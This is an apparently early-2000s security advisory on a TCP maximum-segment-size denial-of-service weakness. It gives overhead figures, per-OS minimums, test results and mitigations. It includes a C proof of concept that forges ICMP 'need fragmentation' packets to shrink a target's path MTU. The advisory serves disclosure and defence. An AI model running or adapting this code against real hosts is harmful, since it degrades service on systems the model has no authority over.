COMMAND

    TCP/IP

SYSTEMS AFFECTED

    most systems

PROBLEM

    Darren Reed  found following.   On a  lan far  far away,  a  rouge
    packet  was  heading  towards  a  server,  ready to start up a new
    storm ...

    If any of you have tested what happens to the ability of a box  to
    perform well when it  has a small MTU  you will know that  setting
    the MTU to (say)  56 on a diskless  thing is a VERY  VERY bad idea
    when NFS read/write packets are generally 8k in size.  Do not  try
    it on a NFS thing  unless you plan to reboot  it, ok ?  Last  time
    Darren did this was when he worked out you could fragment  packets
    inside the TCP header and that lesson was enough for him.

    Following on from this, it occurs to me that the problem with  the
    above  can  possibly  be  reproduced  with  TCP.  How?  That thing
    called "maximum segment size".   The problem?  Well, the  first is
    that there does not  appear to be a  minimum.  The second  is that
    it is negoiated by  the caller, not callee.   Did we hear  someone
    say "oh dear"?

    What's this mean?   Well, if we  connect to www.microsoft.com  and
    set our  MSS to  143 (say),  they need  to send  us 11 packets for
    every  one  they  would  normally  send  us (with an MSS of 1436).
    Total output for them  is 1876 bytes -  a 30% increase.   However,
    that's  not  the  real  problem.   Our  experience  is that hosts,
    especially  PC's,  have  a  lot  of  trouble  handling  *LOTS*  of
    interrupts.   To send  2k out  via the  network, it's  no longer 2
    packets but 20+ - a significant increase in the workload.

    A quick table (based on 20byte IP & TCP header):

        datalen    mss     packets     total bytes bytes %increase
        1436       1436       1           1476            0
        1436       1024       2           1516            3%
        1436        768       2           1516            3%
        1436        512       3           1556            5%
        1436        256       6           1676           13%
        1436        128      12           1916           30%
        1436         64      23           2356           69%
        1436         32      45           3236          119%
        1426         28      52           3516          238% (MTU = 68)
        1436         16      90           5036          241%
        1436          8     180           8636          485%
        1436          1    1436          58876         3989%

    For Solaris,  you can  enforce a  more sane  minimum MSS  than the
    install default (1) with ndd:

        ndd -set /dev/tcp tcp_mss_min 128

    HP-UX 11.* is in the same basket as Solaris.

    *BSD have varying  minimums well above  1 - NetBSD  at 32, FreeBSD
    at 64.  (OpenBSD's comment on this says 32 but the code says 64).

    Linux 2.4 is 88

    We can't see anything in the  registry or MSDN which says what  it
    is for  Windows.   By experimentation,  Win2000 appears  to be 88,
    NT 4 appears to be 1

    Nothing else  besides Solaris  seems to  have anything  close to a
    reasonable manner in which to tune the minimum value.  What's most
    surprising  is  that  there  does  not  appear  to be a documented
    minimum, just as there is no "minimum MTU" size for IP.  If  there
    is, please correct us.

    About the only bonus to this  is that there does not appear  to be
    an easy way to affect the MSS sent in the initial SYN packet.

    Oh, so how's this a potential denial of service attack?  Generally
    network efficiency comes through sending lots of large  packets...
    but don't tell ATM folks that, of course.  Does it work?   *shrug*
    It is not  easy to test...the  only testing Darren  could do (with
    NetBSD) was to use the TCP_MAXSEG setsockopt BUT this only affects
    the sending MSS (now what use is that?), but in testing,  changing
    it from the default 1460 to 1 caused number of packets to go  from
    9 to 2260 to write 1436 bytes  of data to discard.  To send  100 *
    1436 from the NetBSD  box to Solaris8 took  60 seconds (MSS of  1)
    vs  ~1  with  an  MSS  of  1460.   Of  even more significance, one
    connection like  this made  almost no  difference after  the first
    run but running a second saw kernel CPU jump to 30% on an SS20/712
    (we  suspect  there   are  some  serious   TCP  tuning   happening
    dynamically).   The  sending  host  was  likewise afflicted with a
    signifcant CPU usage penalty if more than one was running.   There
    were some  very surprising  things happening  too -  with just one
    session active,  ~170-200pps were  seen with  netstat on  Solaris,
    but with the  second, it was  between 1750 and  1850pps.  Can  you
    say "ACK storm"?  Oh, and for fun you can enable TCP  timestamping
    just to make those headers bigger and run the system a bit  harder
    whilst processing packets!

    Darren didn't investigated the impact of ICMP PMTU discovery,  but
    from his reading of at least the BSD source code, the MTU for  the
    route will  be ignored  if it  is less  than the  default MSS when
    sending out the TCP SYN with the MSS option.  That aside, it  will
    still impact current connections and  would appear to be a  way to
    force the _current_ MSS below that  set at connect time.  On  BSD,
    it will not accept  PMTU updates if the  MTU is less than  296, on
    Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm,  allows
    you to get an effective MSS of less than 88).

    /*
     * (C)Copyright 2001 Darren Reed.
     *
     * maxseg.c
     */
    #include <sys/types.h>
    #include <sys/param.h>
    #include <sys/socket.h>
    #if BSD >= 199306
    #include <sys/sysctl.h>
    #endif
    
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    #include <netinet/ip_var.h>
    #include <netinet/tcp.h>
    #include <netinet/tcp_timer.h>
    #include <netinet/tcp_var.h>
    
    #include <time.h>
    #include <fcntl.h>
    #include <errno.h>
    
    void prepare_icmp(struct sockaddr_in *);
    void primedefaultmss(int, int);
    u_short in_cksum(u_short *, int);
    int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);
    
    
    #define	NEW_MSS	512
    #define	NEW_MTU	1500
    static int start_mtu = NEW_MTU;
    
    void primedefaultmss(fd, mss)
    int fd, mss;
    {
    #ifdef __NetBSD__
	    static int defaultmss = 0;
	    int mib[4], msso, mssn;
	    size_t olen;
    
	    if (mss == 0)
		    mss = defaultmss;
	    mssn = mss;
	    olen = sizeof(msso);
    
	    mib[0] = CTL_NET;
	    mib[1] = AF_INET;
	    mib[2] = IPPROTO_TCP;
	    mib[3] = TCPCTL_MSSDFLT;
	    if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		    err(1, "sysctl");
	    if (defaultmss == 0)
		    defaultmss = msso;
    
	    if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		    err(1, "sysctl");
    
	    if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		    err(1, "sysctl");
    
	    printf("Default MSS: old %d new %d\n", msso, mssn);
    #endif
    
    #if HACKED_KERNEL
	    int opt;
    
	    if (mss)
		    op = mss;
	    else
		    op = 512;
	    if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		    err(1, "setsockopt");
    #endif
    }
    
    
    int
    main(int argc, char *argv[])
    {
	    struct sockaddr_in me, them;
	    int fd, op, olen, mss;
	    char prebuf[16374];
	    time_t now1, now2;
	    struct timeval tv;
    
	    mss = NEW_MSS;
    
	    primedefaultmss(-1, mss);
    
	    fd = socket(AF_INET, SOCK_STREAM, 0);
	    if (fd == -1)
		    err(1, "socket");
    
	    memset((char *)&them, 0, sizeof(me));
	    them.sin_family = AF_INET;
	    them.sin_port = ntohs(atoi(argv[2]));
	    them.sin_addr.s_addr = inet_addr(argv[1]);
    
	    primedefaultmss(fd, mss);
    
	    op = fcntl(fd, F_GETFL, 0);
	    if (op != -1) {
		    op |= O_NONBLOCK;
		    fcntl(fd, F_SETFL, op);
	    }
    
	    op = 1;
	    (void) setsockopt(fd, SOL_SOCKET, TCP_NODELAY, &op, sizeof(op));
    
	    if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	        (errno != EINPROGRESS))
		    err(1, "connect");
    
	    olen = sizeof(op);
	    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		    printf("Remote mss %d\n", op);
	    else
		    err(1, "getsockopt");
    
    #if HACKED_KERNEL
	    olen = sizeof(op);
	    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		    printf("Our mss %d\n", op);
	    else
		    err(1, "getsockopt(+1)");
    #endif
    
	    olen = sizeof(me);
	    if (getsockname(fd, (struct sockaddr *)&me, &olen))
		    err(1, "getsockname");
    
	    (void) read(fd, prebuf, sizeof(prebuf));
    
	    now1 = time(NULL);
	    for (op = 2; op; op--) {
		    icmp_unreach(&me, &them);
		    olen = read(fd, prebuf, sizeof(prebuf));
		    if (olen == -1) {
			    if (errno == ENOBUFS || errno == EAGAIN ||
			        errno == EWOULDBLOCK) {
				    tv.tv_sec = 0;
				    tv.tv_usec = 10000;
				    select(3, NULL, NULL, NULL, &tv);
				    continue;
			    }
			    warn("read");
			    break;
		    }
	    }
	    now2 = time(NULL);
	    printf("Elapsed time %d\n", now2 - now1);
    
	    primedefaultmss(fd, 0);
	    close(fd);
	    return 0;
    }
    
    
    /*
     * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
     */
    static char icmpbuf[256];
    static int icmpsock = -1;
    static struct sockaddr_in destsock;
    
    void
    prepare_icmp(dst)
	     struct sockaddr_in *dst;
    {
	    struct tcphdr *tcp;
	    struct icmp *icmp;
    
	    icmp = (struct icmp *)icmpbuf;
    
	    if (icmpsock == -1) {
    
		    memset((char *)&destsock, 0, sizeof(destsock));
		    destsock.sin_family = AF_INET;
		    destsock.sin_addr = dst->sin_addr;
    
		    srand(getpid());
    
		    icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		    if (icmpsock == -1)
			    err(1, "socket");
    
		    /* the following messy stuff from Adam Glass (icmpsquish.c) */
		    memset(icmp, 0, sizeof(struct icmp) + 8);
		    icmp->icmp_type = ICMP_UNREACH;
		    icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		    icmp->icmp_pmvoid = 0;
    
		    icmp->icmp_ip.ip_v = IPVERSION;
		    icmp->icmp_ip.ip_hl = 5;
		    icmp->icmp_ip.ip_len = htons(NEW_MSS);
		    icmp->icmp_ip.ip_p = IPPROTO_TCP;
		    icmp->icmp_ip.ip_off = htons(IP_DF);
		    icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		    icmp->icmp_ip.ip_id = rand() & 0xffff;
    
		    icmp->icmp_ip.ip_src = dst->sin_addr;
    
		    tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		    tcp->th_sport = dst->sin_port;
	    }
	    icmp->icmp_nextmtu = htons(start_mtu);
	    icmp->icmp_cksum = 0;
    }
    
    
    u_short
    in_cksum(addr, len)
    u_short *addr;
    int len;
    {
	        register int nleft = len;
	        register u_short *w = addr;
	        register int sum = 0;
	        u_short answer = 0;
    
	        /*
	         *  Our algorithm is simple, using a 32 bit accumulator (sum),
	         *  we add sequential 16 bit words to it, and at the end, fold
	         *  back all the carry bits from the top 16 bits into the lower
	         *  16 bits.
	         */
	        while( nleft > 1 )  {
	                sum += *w++;
	                nleft -= 2;
	        }
    
	        /* mop up an odd byte, if necessary */
	        if( nleft == 1 ) {
	                *(u_char *)(&answer) = *(u_char *)w ;
	                sum += answer;
	        }
    
	        /*
	         * add back carry outs from top 16 bits to low 16 bits
	         */
	        sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
	        sum += (sum >> 16);                     /* add carry */
	        answer = ~sum;                          /* truncate to 16 bits */
	        return (answer);
    }
    
    int icmp_unreach(src, dst)
	     struct sockaddr_in *src, *dst;
    {
	    static int donecksum = 0;
	    struct sockaddr_in dest;
	    struct tcphdr *tcp;
	    struct icmp *icmp;
	    int i, rc;
	    u_short sum;
    
	    icmp = (struct icmp *)icmpbuf;
    
	    prepare_icmp(dst);
    
	    icmp->icmp_ip.ip_dst = src->sin_addr;
    
	    sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	    icmp->icmp_ip.ip_sum = sum;
    
	    tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	    tcp->th_dport = src->sin_port;
    
	    sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	    icmp->icmp_cksum = sum;
	    start_mtu /= 2;
	    if (start_mtu < 69)
		    start_mtu = 69;
    
	    i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		       (struct sockaddr *)&destsock, sizeof(destsock));
	    if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	        errno != EWOULDBLOCK)
		    err(1, "sendto");
	    return(0);
    }

    Some people are not  understanding the difference between  the TCP
    MSS and IP's MTU.  Either  that or both you and David  LeBlanc are
    grasping at straws in order to make WindowsNT look better.

    MTU and Path MTU  (PMTU) discovery are not  the same as TCP's  MSS
    but they can and do impact it.

    Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
    (sent lots of  data packets out  that had 1  byte of data)  and he
    got Win2000 to accept an MTU of 69 (effective MSS of 17 after  TCP
    options) through PMTU discovery.  Now, if 20+68 is the reason  why
    88 is  the minimum  MSS Win2000  will accept  then someone doesn't
    understand what  the word  "MTU" means  because it  referes to the
    TOTAL IP datagram length, not the data part.

    Using the C program above one  is able to get Win2000 to  create a
    MTU specific path  to a local  box where the  MTU was 69.   That's
    well under  any number  over 500  (depending on  how you choose to
    see the value).

    Path MTU discovery has absolutely no interaction with the TCP  MSS
    except  that  one  would  expect  it  to  be used if a cached path
    already existed to a host, with  an MTU specific for it set,  when
    initiating or accepting a new TCP connection.

SOLUTION

    Quite clearly the host operating  system needs to set a  much more
    sane minimum MSS than 1.  Given  there is no minimum MTU for IP  -
    well, maybe "68" - it's hard to derive what it should be.

    Anything below 40 should just be banned (that's the point at which
    you're transmitting 50% data, 50% headers).  Most of the defaults,
    above, are  chosen because  it fits  in well  with their  internal
    network  buffering  (some  use  a  default  MSS of 512 rather than
    536 for similar reasons).  But above that, what do you choose?  80
    for a 25/75  or something higher  still?  Whatever  the choice and
    however it  is calculated,  it is  not enough  to just  enforce it
    when the MSS  option is received.   It also needs  to be  enforced
    when the MTU parameter is checked in ICMP "need frag" packets.